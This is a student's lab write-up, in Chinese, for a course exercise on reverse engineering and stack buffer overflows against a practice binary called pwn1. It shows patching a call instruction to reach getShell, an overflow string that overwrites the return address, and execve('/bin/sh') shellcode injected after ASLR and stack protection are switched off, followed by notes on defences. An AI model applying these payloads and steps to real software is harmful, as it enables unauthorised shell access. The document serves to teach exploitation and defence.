2019-2020-2 20175215丁文韬《网络对抗技术》Exp1 PC平台逆向破解
1.逆向及Bof基础实践说明
1.1 实践目标
-
对象:pwn1(linux可执行文件)
- 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
-
目标:使程序执行另一个代码片段:getshell
-
内容:
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 注入一个自己制作的shellcode并运行这段shellcode。
-
现实情况中的攻击目标:
- 运行原本不可访问的代码片段
- 强行修改程序执行流
- 注入运行任意代码
1.2 基础知识
- 熟悉Linux基本操作
- 能看懂常用指令,如管道(|),输入、输出重定向(>)等。
- 理解Bof的原理。
- 能看得懂汇编、机器指令、EIP、指令地址。
- 会使用gdb,vi。
2.直接修改程序机器指令,改变程序执行流程
-
知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
-
学习目标:理解可执行文件与机器指令
-
进阶:掌握ELF文件格式,掌握动态技术
2.1 反汇编查看函数地址
-
对
pwn1
文件进行反汇编,会得到如下结果
-
图中080484b5中的指令为
call 8048491
- 是说这条指令将调用位于地址8048491处的foo函数;
- 其对应机器指令为“e8 d7ffffff”,e8即跳转之意。
- 本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba,但如一解释e8这条指令呢,CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41,41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值.
2.2 在vim中修改地址,反汇编查看结果
-
main函数调用foo,对应机器指令为“e8 d7ffffff”,
- 那我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。
- 用Windows计算器,直接 47d-4ba就能得到补码,是c3ffffff。
-
首先发现直接使用vim打开pwn1文件是乱码
-
接下来执行如下操作(以
$
后的命令为主)
kali@20175215dwt:~/Exp1$ cp pwn1 pwn2
kali@20175215dwt:~/Exp1$ vi pwn2
-
以下操作是在vi内
- 1.按ESC键
- 2.输入以下,将显示模式切换为16进制模式:
:%!xxd
- 3.查找要修改的内容:
/d7ff
(老师使用的是/e8d7
,但我使用/e8d7
查找不到) - 4.找到后前后的内容和反汇编的对比下,确认是地方是正确的
- 5.修改d7为c3
- 6.转换16进制为原格式:
:%!xxd -r
- 7.存盘退出vi:
:wq
-
修改成功后再使用反汇编查看call指令是否正确调用getShell
-
之后运行改后的代码,会得到shell提示符
#
3.通过构造输入参数,造成BOF攻击,改变程序执行流
- 知识要求:堆栈结构,返回地址
- 学习目标:理解攻击缓冲区的结果,掌握返回地址的获取
- 进阶:掌握ELF文件格式,掌握动态技术
3.1反汇编,了解程序的基本功能
- 这里读入字符串,但系统只预留了28字节的缓冲区
- 上面的call调用foo,同时在堆栈上压上返回地址值:80484ba
3.2确认输入字符串哪几个字符会覆盖到返回地址
-
用
gdb 20175215pwn1
调试程序,输入有规律的字符串如1111111122222222333333334444444412345678
,发生段错误产生溢出
-
使用
info r
查看寄存器eip的值,发现输入的1234被覆盖到堆栈上的返回地址,接下来我们就要把字符串中会覆盖EIP的字符替换成getShell的地址。
3.3 确认用什么值来覆盖返回地址
- 于是我们将getShell的地址
0x0804847d
把后面的数值替换,即是输入11111111222222223333333344444444\x7d\x84\x04\x08
3.4 构造输入字符串
-
由为我们没法通过键盘输入
\x7d\x84\x04\x08
这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a
表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。 -
于是我们通过输入
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
来生成这样的文件。然后使用vim查看input文件的内容是否如预期。
- 通过管道符
|
,将input文件作为pwn1的输入。(不知道是什么原因,input里输入的东西没显示出来,但不影响正常使用)
4. 注入Shellcode并执行
4.1 准备一段Shellcode
- shellcode就是一段机器指令(code)
- 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
- 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
- 实践采用老师推荐的shellcode。如下:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\
4.2 准备工作
-
先利用
apt-get install execstack
命令安装execstack软件包
-
然后执行如下命令(以
#
后的命令为准)
root@20175215dwt:/home/kali/Exp1# execstack -s pwn1 //设置堆栈可执行
root@20175215dwt:/home/kali/Exp1# execstack -q pwn1 //查询文件的堆栈是否可执行
X pwn1
root@20175215dwt:/home/kali/Exp1# more /proc/sys/kernel/randomize_va_space
2
root@20175215dwt:/home/kali/Exp1# echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
root@20175215dwt:/home/kali/Exp1# more /proc/sys/kernel/randomize_va_space
0
4.3.1 构造要注入的payload
-
Linux下有两种基本构造攻击buf的方法:
- retaddr+nop+shellcode
- nop+shellcode+retaddr。
-
因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。
-
简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边
-
我们这个buf够放这个shellcode了
-
结构为:nops+shellcode+retaddr。
- nop一为是了填充,二是作为“着陆区/滑行区”。
- 我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。
-
然后我们使用
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
命令,再打开一个终端注入这段攻击buf((cat input_shellcode;cat) | ./pwn1
) -
再开另外一个终端,用gdb来调试pwn1这个进程。
-
1.找到pwn1的进程号是:4430
-
2.启动gdb调试这个进程
-
3.通过设置断点,来查看注入buf的内存地址(这里是坑,看我博客的同学想踩坑看老师的指导书就行了,不用看我的)
-
4.将返回地址改为0xffffd6d0
修改错误。 -
5.查找原因。同上面步骤运行,gdb调试。
看起来buf没什么问题。
发现有问题,应该换一种方法。
4.3.2 构造要注入的payload(Restart)
- 结构为:anything+retaddr+nops+shellcode。
- 看到01020304了,就是返回地址的位置。shellcode就挨着,所以地址是0xffffd6f0
-
最后输入自己找到的地址的位置,注入之后就成功了。
-
以上实践是在非常简单的一个预设条件下完成的:
- (1)关闭堆栈保护(gcc -fno-stack-protector)
- (2)关闭堆栈执行保护(execstack -s)
- (3)关闭地址随机化 (/proc/sys/kernel/randomize_va_space=0)
- (4)在x32环境下
- (5)在Linux实践环境
4.5 结合nc模拟远程攻击
-
在一台机器上的实验结果
-
两台机器上的实验尚未完成,一直没找到什么原因主机1一直出现似乎是端口的问题。
*5. Bof攻击防御技术
5.1. 从防止注入的角度。
在编译时,编译器在每次函数调用前后都加入一定的代码,用来设置和检测堆栈上设置的特定数字,以确认是否有bof攻击发生。
5.2 注入入了也不让运行
5.3 增加shellcode的构造难度
shellcode中需要猜测返回地址的位置,需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实:应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR,地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了。
- /proc/sys/kernel/randomize_va_space用于控制Linux下 内存地址随机化机制(address space layout randomization),有以下三种情况
- 0 - 表示关闭进程地址空间随机化。
- 1 - 表示将mmap的基址,stack和vdso页面随机化。
- 2 - 表示在1的基础上增加栈(heap)的随机化。
5.4 从管理的角度
加强编码质量。注意边界检测。使用最新的安全的库函数。
SP.实验中碰到的问题
1.查找出现的问题
- 老师的实验指导书中使用
/e8d7
查找内容,但不知道为什么,我使用16进制打开的vim中无法使用这个关键字查找到制定内容,于是我转变思路,使用/d7ff
找到了我要修改的内容
2.构造要注入的payload与老师不同出现的问题
-
一开始使用的指导书中的内容,死板的输入,出现如下的问题
-
4.将返回地址改为0xffffd300
修改错误。 -
5.查找原因。同上面步骤运行,gdb调试。
做到这里程序完全崩了。 -
最后结合自己电脑的内存地址,灵活运用,最后完成了第四部分的实验。
SP2.回答老师的问题
1. 实验收获与感想
以前的做的一些无论是C语言,java,抑或是信息系统安全设计基础的实验,基本都是可以死板的按照老师的实验指导来做,就算了解了基本原理也只能解决一些出现的小问题,而这次我自主做实验,参考了很多学长的博客,但最后却还是靠自己总结的内容去做的实验,还有一个就是要看清老师的实验要求,因为文件名没加上学号我又得重新截一遍图了(手动捂脸)。
2. 什么是漏洞?漏洞有什么危害?
- 本次实验的漏洞实在软件的实现上存在缺陷,可以使攻击者在未授权的情况下访问或者破坏系统。
- 漏洞的出现能使一些本来能正常运行的软硬件出现使用的问题,影响到人们正常的工作学习。
SP3.参考资料
1.20154312曾林 - Exp1 PC平台逆向破解
2.2018-2019-2 20165317《网络对抗技术》Exp1 PC平台逆向破解
3.0x11_MAL_逆向与Bof基础.md